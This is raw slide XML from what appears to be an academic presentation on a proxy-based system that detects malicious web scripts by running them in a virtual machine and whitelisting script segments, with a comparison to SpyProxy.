              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Detection Strategies:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1314450" lvl="2" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Verify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>binaries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> have not been </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>modified</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1314450" lvl="2" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>Scan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filesystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>signatures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1314450" lvl="2" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Identify sniffers by checking for raw socket use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1314450" lvl="2" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Query the system within the virtual machine and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>verify the integrity of the response (does </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>lie?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Feed into policy engine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mtClean="0"/>
              <a:t>Detecting Attacks with VMMs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9216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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Injecting Sensors into Kernel (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Asrigo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> ‘06)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Dynamically </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>rewrites kernel code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> to include sensors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Monitors:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1314450" lvl="2" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>Arguments passed to programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1314450" lvl="2" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>Redirecting of streams (hijacking of resources)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1314450" lvl="2" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Modifications of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>filesystem</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1314450" lvl="2" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Sockets listening to unauthorized ports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标题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 smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83971" name="内容占位符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zh-CN" dirty="0" smtClean="0"/>
              <a:t>Problem to solve</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Existing work and background</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F83C16"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Our solution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F83C16"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Motivation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Task completed and remaining plan.</a:t>
            </a:r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Motivation</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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EF0B056D-F299-44B1-9E3E-D311FAE05D8E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr algn="l">
                <a:defRPr/>
              </a:pPr>
              <a:t>19</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/50</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="378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>
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRP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-714375" y="1000125"/>
          <a:ext cx="7000875" cy="3141663"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <p:oleObj spid="_x0000_s37890" name="Visio" r:id="rId4" imgW="6830113" imgH="3074829" progId="">
              <p:embed/>
            </p:oleObj>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37894" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="4071938"/>
            <a:ext cx="9144000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kumimoji="1" lang="en-US" altLang="zh-CN" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
              </a:rPr>
              <a:t>Security Proxy </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2500">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
              </a:rPr>
              <a:t>is a security device deployed on Internet to detect the attack. The advance of security proxy is:</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2500">
              <a:latin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kumimoji="1" lang="en-US" altLang="zh-CN" sz="2500">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
              </a:rPr>
              <a:t>It can access </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
              </a:rPr>
              <a:t>all the traffic </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2500">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
              </a:rPr>
              <a:t>coming in and out the server. </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2500">
              <a:latin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kumimoji="1" lang="en-US" altLang="zh-CN" sz="2500">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
              </a:rPr>
              <a:t>If one web is detected as containing malware code, proxy is easy to block this page or site.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2500">
              <a:latin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kumimoji="1" lang="en-US" altLang="zh-CN" sz="2500">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
              </a:rPr>
              <a:t>Proxy can project both sides by filtering the input and output of server.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="25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 smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16386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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Problem to solve</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Existing work and background</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Our solution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Task completed and remaining plan.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标题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mtClean="0"/>
              <a:t>What we want to do</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106499" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357188" y="1143000"/>
            <a:ext cx="8461375" cy="2357438"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>1. Implement a detection system for malicious script code on proxy.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>2. Design a script filter to filter out as much as possible benign traffic.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0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6D81D28-C455-459C-ACD8-5E0BBAEFA896}" type="slidenum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r>
              <a:rPr lang="en-US" altLang="zh-CN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t>/50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Spyproxy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="911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828800"/>
            <a:ext cx="757813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5029200"/>
            <a:ext cx="81419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proxy that sits between the user and the web and:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>- Loads web pages before the client does to detect attacks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3543300" y="30099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10000" y="2819400"/>
            <a:ext cx="5610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Test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3010694" y="3009900"/>
            <a:ext cx="380206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1905000" y="25908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057400" y="2819400"/>
            <a:ext cx="606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Safe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Our System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3581400"/>
            <a:ext cx="37338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8600" y="55626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43000" y="3962400"/>
            <a:ext cx="3733800" cy="2743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661" name="TextBox 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="3200400"/>
            <a:ext cx="700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latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Proxy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70662" name="TextBox 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="3581400"/>
            <a:ext cx="71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latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>VMM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70663" name="TextBox 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1981200" y="4038600"/>
            <a:ext cx="1838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latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Operating System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7400" y="4572000"/>
            <a:ext cx="2590800" cy="1981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665" name="TextBox 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="4572000"/>
            <a:ext cx="955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Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70666" name="TextBox 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="52578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>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Page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029200" y="55626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0668" name="TextBox 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="5029200"/>
            <a:ext cx="1238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>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Modified Page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>with Hooks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77000" y="4191000"/>
            <a:ext cx="2209800" cy="2362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670" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="4191000"/>
            <a:ext cx="1584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latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>User’s Browser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09800" y="5257800"/>
            <a:ext cx="13716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Page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10400" y="5105400"/>
            <a:ext cx="1219200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Page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w/ Hooks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5029200" y="59436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674" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5257800" y="6019800"/>
            <a:ext cx="669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>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>to Test</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70675" name="TextBox 27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="1371600"/>
            <a:ext cx="8305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n-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>We </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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modify the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1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javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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sent to the user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> to provide the proxy with events to test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altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>We </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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filter script files rather than entire web pages</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="24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标题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dirty="0" smtClean="0"/>
              <a:t>Comparison with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>SpyProxy</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116739" name="内容占位符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SpyProxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> performs similar functionality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web proxy that runs pages in virtual machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Build a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>whitelist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/blacklist for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>pages</a:t>
            </a:r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altLang="zh-CN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Our work </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>improves on this by:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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Using feedback from user to trigger exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Build a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>whitelist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/blacklist for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>scripts</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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标题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dirty="0" smtClean="0"/>
              <a:t>Script code Filter</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符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A73C740-DD91-4831-A081-27F2F5C61C38}" type="slidenum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r>
              <a:rPr lang="en-US" altLang="zh-CN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t>/50</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="214313" y="4143375"/>
            <a:ext cx="8247062" cy="2500313"/>
          </a:xfrm>
          <a:ln/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600" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>What filter for:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"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500" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. when packets first come, construct a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" kern="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>whitelist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> for its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>script code segment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"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500" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. Next time this script code appears, we can decide whether it will be scanned by virtual machine.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2500" kern="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2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4313" y="1214438"/>
            <a:ext cx="8786812" cy="26463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folHlink"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Observation for the script code: </a:t>
            </a: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500" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>unique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> script code segment is far less than the script code segments. Website will </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>reuse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> script code.</a:t>
            </a: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500" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2. script code will </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>not change </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>even the webpage is dynamically </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>changed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>. Such as the first page of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>cnn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.  </a:t>
            </a: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2500" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3. script code of big size has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
